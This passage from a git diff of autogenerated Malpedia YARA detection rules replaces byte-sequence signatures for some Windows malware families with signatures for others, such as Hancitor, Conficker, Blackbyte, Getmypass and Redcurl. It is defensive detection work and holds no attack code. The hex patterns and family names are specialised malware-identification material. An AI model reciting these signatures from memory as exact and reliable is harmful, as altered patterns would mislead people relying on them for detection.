"https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.backswap_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.backconfig" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.backconfig_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "a378488e042d6e06f37e68439e6beddf9b3f11fc0a2449d478058f24368f291d" + logic_hash = "dc29e43fa81d60d5f53e6f4d5e158937c417e8f12650929b20d71338a8cb5ead" score = 75 quality = 75 tags = "FILE" @@ -167980,34 +170839,34 @@ rule MALPEDIA_Win_Backswap_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 5f 5a 5b c9 c21000 83f0ff 5e } - $sequence_1 = { 8b7508 ff4508 8bfb 3bd3 0f8572ffffff 33c9 e9???????? } - $sequence_2 = { 33d2 8bdf 4b eb1c 85c9 } - $sequence_3 = { eb1c 85c9 7508 3bdf 7404 } - $sequence_4 = { ebd4 3c3f 74c4 3c2a 7508 8bdf 897508 } - $sequence_5 = { f366a5 59 5f 5e c9 c20c00 55 } - $sequence_6 = { 74ed 33c0 eb04 8bc6 } - $sequence_7 = { 4b eb1c 85c9 7508 3bdf 7404 8bce } - $sequence_8 = { 83f0ff 5e 5f 5a 5b } - $sequence_9 = { 7482 8b7508 ff4508 8bfb 3bd3 0f8572ffffff 33c9 } + $sequence_0 = { a1???????? 8b0d???????? 8b15???????? 8985f0feffff a1???????? 6a51 8985fcfeffff } + $sequence_1 = { e8???????? 8b4de4 83c40c 6bc930 8975e0 8db1682a4100 } + $sequence_2 = { 8a15???????? 8d8569ffffff 6a00 50 898d64ffffff 889568ffffff } + $sequence_3 = { c1f805 8d1485c0504100 8b0a 83e61f c1e606 03ce } + $sequence_4 = { 8bc3 c1f805 8d3c85c0504100 8bf3 83e61f c1e606 8b07 } + $sequence_5 = { 8b0d???????? 8b15???????? 8985f0feffff a1???????? 6a51 8985fcfeffff 898df4feffff } + $sequence_6 = { 8d8d2cfdffff 68???????? 51 e8???????? 83c414 68401f0000 } + $sequence_7 = { 6a00 50 898d64ffffff 889568ffffff e8???????? } + $sequence_8 = { 8bf1 83e61f 8d3c85c0504100 8b07 c1e606 f644300401 7436 } + $sequence_9 = { 8bec 8b4508 56 8d34c550224100 833e00 7513 } condition: - 7 of them and filesize <122880 + 7 of them and filesize <217088 } -rule MALPEDIA_Win_Darkshell_Auto : FILE +rule MALPEDIA_Win_Hancitor_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "54238af5-7449-55bf-9dc2-08b5916a169b" + id = "e94e88e2-da44-5855-8e98-8220d615aa1e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.darkshell_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hancitor_auto.yar#L1-L234" license_url = "N/A" - logic_hash = "b58c1bc2e0988d2ff26125d2777445ac18dab56ca2991d83e57c5d570ae3c235" + logic_hash = "3fe1f27a710b2ccfc55ec6a2163075344a7f89cf27a8c741d778d1b9ea2b6391" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -168019,34 +170878,48 @@ rule MALPEDIA_Win_Darkshell_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83c004 8901 83c014 8902 6681380b01 7511 } - $sequence_1 = { 6a00 6a00 50 53 ffd5 8be8 } - $sequence_2 = { 7413 8b4c2410 8b54240c 51 52 ffd0 } - $sequence_3 = { ff542414 53 ff542414 56 ff15???????? } - $sequence_4 = { 8d542418 6a04 52 684be12200 50 } - $sequence_5 = { e8???????? 8b4c2414 8bf0 8b442418 6800400000 50 } - $sequence_6 = { 89442418 ffd7 6a00 6a00 6a00 6a00 } - $sequence_7 = { 55 ff542424 55 ff542414 53 } - $sequence_8 = { 8902 6681380b01 7511 8b4c2410 05e0000000 8901 b801000000 } - $sequence_9 = { ff15???????? 8b542410 8d4c2414 51 6a04 52 } + $sequence_0 = { 6a00 6824040000 6a00 6a00 6a00 } + $sequence_1 = { 6800010000 6a40 68???????? e8???????? } + $sequence_2 = { 8bec a1???????? 85c0 740c ff7508 6a00 50 } + $sequence_3 = { 8bec 8b4d08 6a00 6a01 51 } + $sequence_4 = { 68???????? ff7508 c605????????00 ff15???????? } + $sequence_5 = { a3???????? 85c0 7502 5d c3 ff7508 6a00 } + $sequence_6 = { 8b4df4 51 8b55f8 52 8b4510 } + $sequence_7 = { 8b4d08 0fbe11 83fa7d 750e } + $sequence_8 = { 8bd8 83fbff 7509 6a00 57 } + $sequence_9 = { 6a00 6a01 8b5508 52 ff55f4 33c0 8be5 } + $sequence_10 = { 8b4df4 8b5104 83ea08 d1ea 8955d4 } + $sequence_11 = { c60600 ff15???????? 8b3d???????? 85c0 740a } + $sequence_12 = { 8b4dec 8b55f4 035128 8b4518 8910 eb02 } + $sequence_13 = { 8945f8 8b4df8 894df4 6a00 6a01 } + $sequence_14 = { 7411 8d85f4fdffff 50 8b4d08 51 } + $sequence_15 = { 8b4d08 53 56 57 8b413c } + $sequence_16 = { 8945cc 8365e400 c745bc0a000000 eb07 8b45bc } + $sequence_17 = { c3 4b fd 008d4556f400 08640f08 ed fec3 } + $sequence_18 = { a1???????? 8945b4 a1???????? 83c044 a3???????? 8b45b4 83e803 } + $sequence_19 = { b9382baa99 c7458ce4f25701 ff15???????? 894da0 a1???????? } + $sequence_20 = { 6a00 6a00 ff15???????? c745a064000000 } + $sequence_21 = { c645f300 c645fc65 c645fd00 c745f8dc030000 8365b800 } + $sequence_22 = { 8945dc e9???????? b9382baa99 c745f464000000 } + $sequence_23 = { 0f8482000000 c645f301 0fb645f3 85c0 7476 a1???????? 83c044 } condition: - 7 of them and filesize <344064 + 7 of them and filesize <106496 } -rule MALPEDIA_Win_Redsalt_Auto : FILE +rule MALPEDIA_Win_Conficker_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "295994ac-254e-59ee-b227-ac14e9e1f055" + id = "3a6101de-ccfd-52f9-bf48-95f37d3da01a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redsalt" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.redsalt_auto.yar#L1-L217" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.conficker_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "03f89ce4b045eb8ff5f60169a4045ddc5e403a310ae115cf10989b990183d50a" + logic_hash = "a2e85b8534ced36c659844072e09fbb061c134856a103a96122c39a859220309" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -168058,86 +170931,77 @@ rule MALPEDIA_Win_Redsalt_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 750b 68e8030000 ff15???????? e8???????? } - $sequence_1 = { 83c414 33c9 83f8ff 0f95c1 } - $sequence_2 = { e8???????? 85c0 750a 6a32 } - $sequence_3 = { c745d060ea0000 6a04 8d45d0 50 6806100000 } - $sequence_4 = { 51 ffd6 85c0 7510 } - $sequence_5 = { 85c0 7515 c705????????01000000 ff15???????? e9???????? } - $sequence_6 = { 83c9ff 85f6 7c0e 83fe7f 7f09 } - $sequence_7 = { 6a01 6a00 6a01 6800000080 } - $sequence_8 = { 7509 80780120 7503 83c002 } - $sequence_9 = { 8d8530fcffff 50 e8???????? 83c40c } - $sequence_10 = { 6a00 52 c744242401000000 8944242c c744243002000000 ff15???????? } - $sequence_11 = { c60100 5f 5e 33c0 } - $sequence_12 = { 83c40c eb02 33c0 8b4df4 } - $sequence_13 = { e8???????? 83c408 6800010000 68???????? } - $sequence_14 = { c1fa04 c0e302 0ad3 83c004 } - $sequence_15 = { 833800 750f c705????????01000000 e9???????? } - $sequence_16 = { eb03 83caff 8b442410 c0e106 } - $sequence_17 = { f7e7 8bea d1ed 33c0 83ef03 8a06 83c603 } - $sequence_18 = { c644243423 c644243572 c64424367a c644243700 } - $sequence_19 = { c8201cdd f7be5b408d58 1b7f01 d2cc } - $sequence_20 = { d2cc bbe3b46b7e 6aa2 dd45ff } - $sequence_21 = { e8???????? 85ed 4863cd 488be8 } - $sequence_22 = { e8???????? 8905???????? 48488b942498020000 488b8c2490020000 } - $sequence_23 = { e8???????? 8903 83f8ff 0f858e3e0b00 } - $sequence_24 = { e8???????? 8905???????? 4883c428 7502 } + $sequence_0 = { ebe4 f60638 75a8 b008 d0ef 1400 } + $sequence_1 = { df6de8 51 df6df8 51 } + $sequence_2 = { 8bec 83ec20 8b0d???????? a1???????? 8365f800 56 } + $sequence_3 = { 3c04 7415 42 42 60 b066 f2ae } + $sequence_4 = { c3 6a10 68???????? e8???????? 68???????? ff15???????? } + $sequence_5 = { 3345f8 33c7 33c6 50 ff15???????? 59 5f } + $sequence_6 = { 8b4508 33d2 8910 895004 33c9 894c8808 41 } + $sequence_7 = { 8d85f8fbffff ff7510 50 e8???????? } + $sequence_8 = { 8954241c 61 c3 ac } + $sequence_9 = { 55 8bec 83ec20 8b0d???????? a1???????? } condition: - 7 of them and filesize <2957312 + 7 of them and filesize <335872 } -rule MALPEDIA_Win_Unidentified_061_Auto : FILE +rule MALPEDIA_Win_Blackbyte_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "59888b60-a3e6-5e9f-a441-429646fe0731" - date = "2023-07-11" - modified = "2023-07-15" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_061" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_061_auto.yar#L1-L123" + id = "ae2ced49-3989-5cc9-8c98-64c5f933a895" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbyte" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.blackbyte_auto.yar#L1-L158" license_url = "N/A" - logic_hash = "ee3ce5b6c77f09c690f7a934c26be09c58c4fcdee70275b61c00e527d8aa097d" + logic_hash = "1cee2f7e2bce0af57e75d6fdf4454ccb725b7569d4236140429240d2a7df1fe9" score = 75 quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20230705" - malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41" - malpedia_version = "20230715" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" malpedia_license = "CC BY-SA 4.0" malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d85d4fdffff 50 e8???????? c9 } - $sequence_1 = { 89b5f0fdffff 899decfdffff 89b5f4feffff 899df0feffff ff15???????? 8945fc } - $sequence_2 = { 51 8365fc00 8d45fc 50 68???????? 6801000080 ff15???????? } - $sequence_3 = { 8945f0 0fb705???????? 50 ff15???????? 668945ee } - $sequence_4 = { 68???????? 56 ff15???????? 83c41c 8d4601 5e eb09 } - $sequence_5 = { 7417 03f3 3bf7 7ccb eb2f 7d29 } - $sequence_6 = { 83cfff c6457300 3b7566 7cb5 3b7566 } - $sequence_7 = { 53 57 6a04 33ff 33db } - $sequence_8 = { 5b c9 c20800 81ec00040000 68???????? 68???????? ff15???????? } - $sequence_9 = { eb04 c645fb3d 6a05 8d45f8 50 ff750c c645fc00 } + $sequence_0 = { 488d15bc010000 4889542478 4889842480000000 488d542478 4889942490000000 c644242701 } + $sequence_1 = { 488d0db4020000 488908 833d????????00 7520 488b4c2428 48894808 } + $sequence_2 = { 0fb64210 88442408 0fb64211 88442409 } + $sequence_3 = { 0fb6420b 8844240b 0fb6420c 8844240c 0fb6420d 8844240d 0fb6420e } + $sequence_4 = { 488d4a01 488b442428 488b5c2430 4883f903 } + $sequence_5 = { 0101 ffc5 3b6b68 0f82e6feffff } + $sequence_6 = { 488d542478 4889942490000000 c644242701 488b9c24a8000000 488b8c24b0000000 e8???????? } + $sequence_7 = { 488d4250 488b542430 488d5a50 b918000000 } + $sequence_8 = { 0fb6420d 8844240d 0fb6420e 8844240e 0fb6420f 8844240f } + $sequence_9 = { 488d542470 4889942488000000 c644241f01 488b9c24a0000000 } + $sequence_10 = { 488d4a01 488b442430 488b5c2438 90 4883f90f } + $sequence_11 = { 0fb64212 8844240a 0fb64213 8844240b } + $sequence_12 = { 0fb6420f 8844240f 488b442408 48894108 } + $sequence_13 = { 488d5c244b b902000000 0f1f440000 e8???????? } + $sequence_14 = { 014608 498bce ffd7 448b85e8040000 } + $sequence_15 = { 0fb64211 88442409 0fb64212 8844240a } condition: - 7 of them and filesize <360448 + 7 of them and filesize <9435136 } -rule MALPEDIA_Win_Lpeclient_Auto : FILE +rule MALPEDIA_Win_Leouncia_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ff5559d0-76ba-5f50-8136-3eeb9fa351f1" + id = "39b73bd1-c371-5610-827d-6193acb69151" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lpeclient" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lpeclient_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.leouncia" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.leouncia_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "cc71b8a0d92e690c3547182b96989e3a466b7b3af36dfae852a2105f4c91b9a4" + logic_hash = "ce0406952808d71dc84c670f24e39c297086db41d40b8ca03d26d62e66180e61" score = 75 quality = 75 tags = "FILE" @@ -168151,32 +171015,32 @@ rule MALPEDIA_Win_Lpeclient_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { f0ff03 8bce e8???????? eb2b 83f8ff 7526 4c8d2567f60000 } - $sequence_1 = { 33c0 80f90a 0f94c0 8944244c 488d054a1b0100 } - $sequence_2 = { 33c0 488bfe 66f2af 48f7d1 48ffc9 0f8456010000 } - $sequence_3 = { e8???????? c1eb03 85db 0f8e52130000 8b4c2450 8b542450 4c8d5e02 } - $sequence_4 = { 498be3 5f c3 48895c2410 4889742418 57 4881ec30020000 } - $sequence_5 = { 7406 81f1783bf682 48ffc7 48ffca 75e6 443bc1 410f94c5 } - $sequence_6 = { 0fb64c38ff 4132c8 880a 4183c10b 41ffc2 } - $sequence_7 = { 0bd8 418b0424 8d0c03 8bfb 448bc1 48c1e918 83e10f } - $sequence_8 = { 488d0d0f570100 ff15???????? 4c8b4308 488d1546e90000 488d0df74e0100 ff15???????? 488d0d9a480100 } - $sequence_9 = { 33db c74424646b000000 ff15???????? 448d4b01 448d4307 488d95a00b0000 } + $sequence_0 = { f3ab 8d442408 50 56 } + $sequence_1 = { 52 50 a1???????? 8d8c248c050000 } + $sequence_2 = { 83c208 8908 8b4e04 894804 8a0d???????? } + $sequence_3 = { ff15???????? 5f b801000000 5e 81c438040000 c3 83c9ff } + $sequence_4 = { c3 55 56 57 8d542410 6a10 } + $sequence_5 = { 83c424 33d2 33ff 85c0 7e31 } + $sequence_6 = { c3 8bc8 83e01f c1f905 8b0c8d60c14000 } + $sequence_7 = { ff2485ba504000 834df0ff 8955cc 8955d8 8955e0 8955e4 8955fc } + $sequence_8 = { c744241c00000000 c744241400040000 c7450000000000 e8???????? 83c404 8bf0 8d442410 } + $sequence_9 = { ff2485ba504000 834df0ff 8955cc 8955d8 8955e0 8955e4 } condition: - 7 of them and filesize <289792 + 7 of them and filesize <114688 } -rule MALPEDIA_Win_Gearshift_Auto : FILE +rule MALPEDIA_Win_Getmypass_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "02540c00-8de2-5ac5-936a-14a6336e7666" + id = "083431d4-35f0-5afc-be73-c4abda9f956c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gearshift" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gearshift_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmypass" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.getmypass_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "1c8a80ba14390df1b7bcd5e4b955652a287b76aebf22d78fc43b89631a984860" + logic_hash = "73655fc056c3c045e75de418123d8e1cd087892e700c185d02f9fb25dda3b86c" score = 75 quality = 75 tags = "FILE" @@ -168190,32 +171054,32 @@ rule MALPEDIA_Win_Gearshift_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4881c4c0000000 5f c3 85c0 0f85a9000000 } - $sequence_1 = { 4d8bde 4d2b5d30 0f84a1000000 488b4500 488b5d08 } - $sequence_2 = { 4883ec28 48833d????????00 740a b801000000 4883c428 c3 488d0dc9a80000 } - $sequence_3 = { 4823f1 66413b7806 0f83ce000000 48895c2448 4c89642450 4c8d25566a0300 4a8d5c003c } - $sequence_4 = { 83c8ff e9???????? 4c8bfb 4c8be3 488d05363c0300 49c1fc05 } - $sequence_5 = { 4885c0 0f8418010000 4c8d442470 41b910010000 488bd0 488bcb 48897c2420 } - $sequence_6 = { 488bd8 ff9688000000 4c8bc3 33d2 488bc8 8947f8 ff96a8000000 } - $sequence_7 = { 7522 48ffc1 498d0408 493bc3 7cec 4963c2 4803c6 } - $sequence_8 = { 4533c0 33d2 498bcc 44896c2428 48897c2420 ff15???????? ba01000000 } - $sequence_9 = { 0fb7d1 eb09 488b4508 488d540102 } + $sequence_0 = { 83c201 8955fc ebcb 837dfc05 7e04 b001 eb02 } + $sequence_1 = { 0fb64d08 85c9 7418 8b9594fdffff 52 } + $sequence_2 = { 68???????? 68???????? e8???????? 83c408 8945fc 837dfc00 7463 } + $sequence_3 = { 6a00 8b45f8 50 ff15???????? e8???????? } + $sequence_4 = { 8945f4 837df400 742d 8b55f4 0fb702 83f831 750c } + $sequence_5 = { e8???????? 83c404 a3???????? 8b55f8 52 e8???????? 83c404 } + $sequence_6 = { 83f835 7409 0fbe4d08 83f934 } + $sequence_7 = { e8???????? 83c404 8945fc 837dfcff 740e } + $sequence_8 = { 8b55f8 8b4204 2b450c 8b4df8 0301 50 } + $sequence_9 = { 83f801 7509 c745e400000000 eb17 8b5508 83c201 } condition: - 7 of them and filesize <540672 + 7 of them and filesize <49152 } -rule MALPEDIA_Win_Magala_Auto : FILE +rule MALPEDIA_Win_Shipshape_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "57b76c6b-52c3-5f25-9fd2-257d2fe2adf4" + id = "77ebf79f-670a-594a-bd26-db4684807e7a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.magala" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.magala_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shipshape" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.shipshape_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "bd9ee6cce82c810cf18ac629b3f76ce4da7e66a1f258b71b1396e2e5be340ce0" + logic_hash = "d30091c6ebd49f11de789ea622fcb4cbfab75e230e1b049ba06177bb5b7dc7cb" score = 75 quality = 75 tags = "FILE" @@ -168229,32 +171093,32 @@ rule MALPEDIA_Win_Magala_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b4004 838c054cffffff04 8b8538ffffff 8b4004 c6840578ffffff30 2b17 744e } - $sequence_1 = { 8b7dd0 3bdf 0f849d000000 33c0 c745e800000000 6aff 50 } - $sequence_2 = { 8bcf e8???????? 56 8bd0 c645fc0c 8d4da8 e8???????? } - $sequence_3 = { 8a55d8 c645fc00 83f810 7242 } - $sequence_4 = { e8???????? 8b4df8 83c40c 837e1410 894e10 7211 } - $sequence_5 = { 6685c0 75f4 a1???????? 8b550c } - $sequence_6 = { 6a01 50 8b08 ff513c 85c0 75b8 50 } - $sequence_7 = { 8995e0fdffff 8955fc 8b1d???????? 0f1f8000000000 } - $sequence_8 = { c745e800000000 c745ec0f000000 c645d800 e8???????? c745fc00000000 8d4e04 } - $sequence_9 = { e8???????? 8b4df8 b853d9de75 8b75f4 33db 2bce f7e9 } + $sequence_0 = { 68???????? 68???????? 8d942440020000 68???????? 52 } + $sequence_1 = { 83e103 50 f3a4 ffd3 e9???????? 56 e8???????? } + $sequence_2 = { 68???????? 8d942440020000 68???????? 52 e8???????? 83c434 } + $sequence_3 = { c1f905 8b0c8d60d54000 f644c10401 8d04c1 7403 8b00 } + $sequence_4 = { 8d542438 8d842400070000 52 50 } + $sequence_5 = { 8d84244c040000 68???????? 50 e8???????? 8d8c2454040000 51 } + $sequence_6 = { 8d4c2414 50 51 6a00 6a00 6a00 } + $sequence_7 = { 5b 81c440060000 c3 56 57 } + $sequence_8 = { 50 51 ffd3 5f 5e 33c0 } + $sequence_9 = { 83c418 3bc6 7e0f 5f 5e } condition: - 7 of them and filesize <589824 + 7 of them and filesize <338386 } -rule MALPEDIA_Win_Electricfish_Auto : FILE +rule MALPEDIA_Win_Maggie_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b2332381-c1cc-58e9-8fab-7070fccf8e24" + id = "d5276a3c-46d0-5873-87dd-9d6cf0c2cf8b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.electricfish" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.electricfish_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maggie" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.maggie_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "1f7cb8b65f3bb65395bc124290e1a31ce340990c85196e747881fa433bd41f37" + logic_hash = "41d76bd3fbb547d408b10f3113f1f0a7db8f68879c6d91dc7c6cf7b7ea8b4803" score = 75 quality = 75 tags = "FILE" @@ -168268,32 +171132,32 @@ rule MALPEDIA_Win_Electricfish_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 83c404 85c0 0f84e3fdffff 8b442410 6a00 50 } - $sequence_1 = { e8???????? 8bd8 83c404 85db 7523 683e010000 68???????? } - $sequence_2 = { c3 8b5104 57 6a77 68???????? 8910 8b39 } - $sequence_3 = { 8b442408 6855090000 68???????? 6a41 6896010000 6a14 c70050000000 } - $sequence_4 = { e8???????? 83c418 85c0 0f8fd7faffff 5f 5e 5d } - $sequence_5 = { 8945c4 8945c8 8945cc 8945d0 89a540ffffff 6aff 894110 } - $sequence_6 = { 689b010000 68???????? 6a08 e8???????? 83c40c 85c0 751f } - $sequence_7 = { 51 55 e8???????? 83c408 3bc3 7504 6a6e } - $sequence_8 = { c3 57 56 e8???????? 83c408 6893000000 68???????? } - $sequence_9 = { 0fb74550 c7459418001800 c7459848000000 84db 7402 03c0 0fb74d18 } + $sequence_0 = { ff15???????? e8???????? 84c0 74ec e8???????? } + $sequence_1 = { ff15???????? 83f8ff 750f ff15???????? 2d33270000 f7d8 1bc0 } + $sequence_2 = { 83f8ff 750f ff15???????? 2d33270000 f7d8 1bc0 } + $sequence_3 = { 750f ff15???????? 2d33270000 f7d8 1bc0 } + $sequence_4 = { ff15???????? 83f8ff 750f ff15???????? 2d33270000 f7d8 } + $sequence_5 = { 83f8ff 750f ff15???????? 2d33270000 f7d8 } + $sequence_6 = { b8ff000000 663b05???????? 7505 e8???????? e8???????? 84c0 } + $sequence_7 = { 663b05???????? 7505 e8???????? e8???????? 84c0 } + $sequence_8 = { 7511 ff15???????? 85c0 7407 33c0 } + $sequence_9 = { 7511 ff15???????? 85c0 7407 33c0 e9???????? } condition: - 7 of them and filesize <3162112 + 7 of them and filesize <611328 } -rule MALPEDIA_Win_Ripper_Atm_Auto : FILE +rule MALPEDIA_Win_Lolsnif_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a163a628-88ff-5ee3-8ab0-3e7869e5ed11" + id = "1d5fbfc8-0217-55f5-a391-424b7e7d3b81" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ripper_atm" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ripper_atm_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lolsnif" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lolsnif_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "30a8a446c0211fbfa8563685de5143789e29b7c89e693b370c3a643209d252a9" + logic_hash = "9bce9d984017297751bb54a3f5eaf0b3b4bc516f4f45f71420e0fbe5f0438c0a" score = 75 quality = 75 tags = "FILE" @@ -168307,32 +171171,32 @@ rule MALPEDIA_Win_Ripper_Atm_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b7d08 2175fc 397714 7e2a ff770c 8b33 8bcb } - $sequence_1 = { 0f434dd8 837dd408 8d5598 52 8d9550ffffff 52 } - $sequence_2 = { 3938 8b45ec 7408 8b4de8 3b4810 7327 8b4e08 } - $sequence_3 = { 6a0f 50 ff15???????? 85c0 7402 32c0 c20800 } - $sequence_4 = { 8b02 6a04 8b4804 03ca e8???????? } - $sequence_5 = { 6a1c e8???????? 59 85c0 7420 33c9 c7400410000000 } - $sequence_6 = { c1f805 83e21f 8b0c85f0974400 c1e206 8a441124 3245fe 247f } - $sequence_7 = { 51 8d55c8 8d4d8c e8???????? 83c410 84c0 7445 } - $sequence_8 = { 8bf9 50 e8???????? ff7518 8d45ec ff7514 8bcf } - $sequence_9 = { 03f0 8b442424 2bc1 99 f77c2418 47 3bf8 } + $sequence_0 = { c745ecebfecccc 8945f8 895dfc e8???????? 85c0 0f84e6000000 c745fc10000000 } + $sequence_1 = { 8d4510 50 ff35???????? e8???????? 8bf8 85ff 0f8576010000 } + $sequence_2 = { 8945fc 7460 894508 ff35???????? 8b450c ff7510 e8???????? } + $sequence_3 = { 6817010000 1bc0 51 23c6 50 e8???????? e9???????? } + $sequence_4 = { 3bf1 742b 53 8b5f04 } + $sequence_5 = { 8bf8 85ff 754c 8b45fc } + $sequence_6 = { 6a20 50 ff15???????? 3bc3 0f84eb000000 68???????? 50 } + $sequence_7 = { 8b471c 3bc3 7411 50 53 ff35???????? ff15???????? } + $sequence_8 = { 85c0 0f841b020000 50 ff7320 e8???????? 8bf0 } + $sequence_9 = { bf02010000 eb08 ff15???????? 8bf8 } condition: - 7 of them and filesize <724992 + 7 of them and filesize <425984 } -rule MALPEDIA_Win_Tiger_Rat_Auto : FILE +rule MALPEDIA_Win_Redcurl_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c2ea69b5-54d0-5c61-bb49-4f65b838d0af" + id = "efe32a98-15fa-5dd0-a3ff-0a4fdcaec5ff" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiger_rat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tiger_rat_auto.yar#L1-L165" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redcurl" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.redcurl_auto.yar#L1-L190" license_url = "N/A" - logic_hash = "bed3ce3d252a7d616792a16e358ffda1357857c1fa2b5862a7f71cbabe456650" + logic_hash = "550bb424cec4343fdcbf9ff6b82c03a2bb6c5d2f01439a45b43da803dcee1f93" score = 75 quality = 75 tags = "FILE" @@ -168346,40 +171210,44 @@ rule MALPEDIA_Win_Tiger_Rat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4883c128 4889742448 48897c2450 ff15???????? } - $sequence_1 = { 0f11400c 488b4e28 488b5618 488b01 ff5010 } - $sequence_2 = { 4883c108 e8???????? 4d8b4618 41b901000000 } - $sequence_3 = { 33d2 41b80c000100 488bd8 e8???????? 4c63442430 488b4f08 } - $sequence_4 = { 4883c108 413bc0 7cef eb06 4898 